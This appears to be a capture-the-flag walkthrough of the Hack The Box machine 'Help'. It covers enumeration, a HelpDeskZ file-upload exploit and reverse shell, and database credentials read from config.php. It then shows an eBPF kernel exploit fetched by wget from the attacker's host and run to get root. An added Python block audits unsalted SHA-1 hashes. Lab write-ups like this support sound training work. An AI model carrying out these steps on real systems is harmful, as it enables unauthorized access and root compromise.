| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| Help - HTB | Easy | Linux | |
Walkthrough
nmap scan:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I found nothing on port 3000, so I focused on port 80. When I ran a gobuster scan I got the following results.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# gobuster dir --add-slash --expanded --follow-redirect --url http://10.10.10.121/ --no-error -t 50 --extensions php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt| tee gobuster3
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.121/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,html
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/09/12 09:04:47 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.121/.htpasswd/ (Status: 403) [Size: 297]
http://10.10.10.121/.htpasswd.php (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.txt (Status: 403) [Size: 300]
http://10.10.10.121/.htpasswd.html (Status: 403) [Size: 301]
http://10.10.10.121/.htaccess/ (Status: 403) [Size: 297]
http://10.10.10.121/.htaccess.php (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.txt (Status: 403) [Size: 300]
http://10.10.10.121/.htaccess.html (Status: 403) [Size: 301]
http://10.10.10.121/icons/ (Status: 403) [Size: 293]
http://10.10.10.121/index.html (Status: 200) [Size: 11321]
http://10.10.10.121/javascript/ (Status: 403) [Size: 298]
http://10.10.10.121/server-status/ (Status: 403) [Size: 301]
http://10.10.10.121/support/ (Status: 200) [Size: 4453]
An application called HelpDeskZ is running at http://10.10.10.121/support/. There are no default credentials, but there are some published exploits for its version number.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Help]
└─# searchsploit HelpDeskZ
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
In a second gobuster scan I found http://10.10.10.121/support/readme.htm, which stated that the version number is 1.0.2, so we can use the exploits; however, I just could not get the unauthenticated file upload exploit to work. So I started researching online.
https://gist.githubusercontent.com/dasithsv/d2b0c8cea39096e19f336f5e29bbf803/raw/a6d24e637a9fb3dfb7c6d1598980af2594f6a168/HelpDeskZ 1.0.2 - Arbitrary File Upload.py
When I read the exploit at that address, I saw that I had actually been using the existing exploit incorrectly. I first had to upload a file to the system: I uploaded my reverse shell through http://10.10.10.121/support/?v=submit_ticket&action=confirmation and then ran the exploit.
┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
1631455471
┌──(root💀kali)-[/home/…/HTB/Linux/Help/exploit]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.121: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
07:04:34 up 56 min, 0 users, load average: 1.15, 1.27, 1.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$
And I got a reverse shell. Let's read the first flag.
help@help:/home$ cd help
cd help
help@help:/home/help$ ls
ls
total 76
drwxr-xr-x 7 help help 4096 Jan 11 2019 .
drwxr-xr-x 3 root root 4096 Nov 27 2018 ..
-rw-rw-r-- 1 help help 272 Jan 11 2019 .bash_history
-rw-r--r-- 1 help help 220 Nov 27 2018 .bash_logout
-rw-r--r-- 1 root root 1 Nov 27 2018 .bash_profile
-rw-r--r-- 1 help help 3771 Nov 27 2018 .bashrc
drwx------ 2 help help 4096 Nov 27 2018 .cache
drwxr-xr-x 4 help help 4096 Sep 12 06:08 .forever
-rw------- 1 help help 442 Nov 28 2018 .mysql_history
drwxrwxr-x 2 help help 4096 Nov 27 2018 .nano
drwxrwxr-x 290 help help 12288 Jan 11 2019 .npm
-rw-r--r-- 1 help help 655 Nov 27 2018 .profile
-rw-rw-r-- 1 help help 66 Nov 28 2018 .selected_editor
-rw-r--r-- 1 help help 0 Nov 27 2018 .sudo_as_admin_successful
-rw-rw-r-- 1 help help 225 Dec 11 2018 .wget-hsts
drwxrwxrwx 6 root root 4096 Jan 11 2019 help
-rw-rw-r-- 1 help help 946 Nov 28 2018 npm-debug.log
-rw-r--r-- 1 root root 33 Nov 28 2018 user.txt
help@help:/home/help$ cat user.txt
cat user.txt
bb8a7b36bdce0c61ccebaa173ef946af
Afterwards I examined the machine. Here are the results I found interesting.
help 685 0.0 0.2 947668 2992 ? Ssl 06:08 0:00 /usr/bin/nodejs /usr/local/lib/node_modules/forever/bin/monitor /home/help/help/dist/bundle.js
help 695 0.7 3.7 990444 36928 ? Sl 06:08 0:27 _ /usr/bin/nodejs /home/help/help/dist/bundle.js
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
help@help:/var/www/html/support$ find /var/www/html/support -name "*config*" 2>/dev/null
<port$ find /var/www/html/support -name "*config*" 2>/dev/null
/var/www/html/support/includes/config.php
help@help:/var/www/html/support$ cat /var/www/html/support/includes/config.php
<port$ cat /var/www/html/support/includes/config.php
<?php
$config['Database']['dbname'] = 'support';
$config['Database']['tableprefix'] = '';
$config['Database']['servername'] = 'localhost';
$config['Database']['username'] = 'root';
$config['Database']['password'] = 'helpme';
$config['Database']['type'] = 'mysqli';
?>
help@help:/var/www/html/support$
mysql> select * from users;
select * from users;
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| id | salutation | fullname | email | password | timezone | status |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
| 1 | 0 | helpme | [email protected] | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
| 2 | 0 | xcvxv | [email protected] | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL | 1 |
+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+
c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz
[*] fst130 Does 'help' have mail?.......................................... yes!
-rw-rw---- 1 help mail 27501 Sep 12 08:35 /var/mail/help
var _user = { username: '[email protected]', password: '5d3c93182bb20f07b994a7f617e99cff' };
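The `users` table above stores passwords as bare, unsalted SHA-1, which is why the `helpme` hash fell to a wordlist. The following Python is an added example, not code from this page or from HelpDeskZ: it audits hashes of that shape against a small constructed wordlist and shows the salted, slow PBKDF2 record format (a constructed layout, not HelpDeskZ's) that a fix would store instead.

```python
import hashlib
import hmac
import os
import re

# Constructed input: the two rows of the HelpDeskZ `users` table shown above
# (hash values as on the page), keyed by fullname.
USERS = {
    "helpme": "c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca",
    "xcvxv": "ec09fa0d0ba74336ea7fe392869adb198242f15a",
}
# Constructed mini wordlist; a real audit would use a full list.
WORDLIST = ["password", "support", "helpme", "godhelpmeplz"]

BARE_SHA1 = re.compile(r"^[0-9a-f]{40}$")


def looks_like_unsalted_sha1(stored: str) -> bool:
    """40 hex digits, no scheme prefix, no salt: the shape of a bare SHA-1."""
    return bool(BARE_SHA1.match(stored))


def find_weak_passwords(users: dict, wordlist: list) -> dict:
    """Return {user: password} for every bare-SHA-1 hash equal to a wordlist entry.
    One SHA-1 per candidate tests every account at once; that is exactly why an
    unsalted fast hash cannot protect the table once it leaks."""
    table = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    return {name: table[h] for name, h in users.items()
            if looks_like_unsalted_sha1(h) and h in table}


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, slow replacement: 'pbkdf2_sha256$iter$salthex$dkhex' (constructed layout)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False  # not in the migrated format (e.g. a legacy bare SHA-1)
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

Running `find_weak_passwords(USERS, WORDLIST)` flags only the `helpme` account; a record produced by `hash_password` no longer matches the bare-SHA-1 shape and cannot be checked across accounts with a single hash computation.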
None of these worked, so I ran the exploit suggester.
help@help:/tmp$ wget http://10.10.14.18/linux-exploit-suggester.sh
wget http://10.10.14.18/linux-exploit-suggester.sh
--2021-09-12 10:12:06-- http://10.10.14.18/linux-exploit-suggester.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 88891 (87K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'
linux-exploit-sugge 100%[===================>] 86.81K 466KB/s in 0.2s
2021-09-12 10:12:06 (466 KB/s) - 'linux-exploit-suggester.sh' saved [88891/88891]
help@help:/tmp$ chmod +x linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
help@help:/tmp$
help@help:/tmp$
help@help:/tmp$
help@help:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
78 kernel space exploits
48 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5899] s-nail-privget
Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
Exposure: probable
Tags: [ ubuntu=16.04 ],manjaro=16.10
Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Comments: Distros use own versioning scheme. Manual verification needed.
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
help@help:/tmp$ wget http://10.10.14.18/cve-2017-16995.c
wget http://10.10.14.18/cve-2017-16995.c
--2021-09-12 10:57:57-- http://10.10.14.18/cve-2017-16995.c
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'
cve-2017-16995.c 100%[===================>] 13.41K --.-KB/s in 0.09s
2021-09-12 10:57:57 (157 KB/s) - 'cve-2017-16995.c' saved [13728/13728]
help@help:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
help@help:/tmp$ ls
ls
total 1040
drwxrwxrwt 10 root root 4096 Sep 12 10:58 .
drwxr-xr-x 22 root root 4096 Nov 28 2018 ..
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .ICE-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .Test-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .XIM-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 .font-unix
drwxrwxrwt 2 root root 4096 Sep 12 06:08 VMwareDnD
-rwxrwxrwx 1 help help 18440 Sep 12 10:58 cve-2017-16995
-rw-rw-rw- 1 help help 13728 Sep 12 10:52 cve-2017-16995.c
-rwxrwxrwx 1 help help 452509 Aug 26 13:47 linpeas.sh
-rwxrwxrwx 1 help help 88891 Sep 8 14:58 linux-exploit-suggester.sh
-rwxrwxrwx 1 help help 41177 Sep 8 14:34 lse.sh
-rw-rw-rw- 1 help help 200427 Sep 12 07:12 result1
-rw-rw-rw- 1 help help 193317 Sep 12 08:36 result2
drwx------ 3 root root 4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ
drwx------ 2 root root 4096 Sep 12 06:08 vmware-root
help@help:/tmp$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003af7ba00
[*] Leaking sock struct from ffff88001f403c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003912bbc0
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003912bbc0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
b7fe6082dcdf0c1b1e02ab0d9daddb98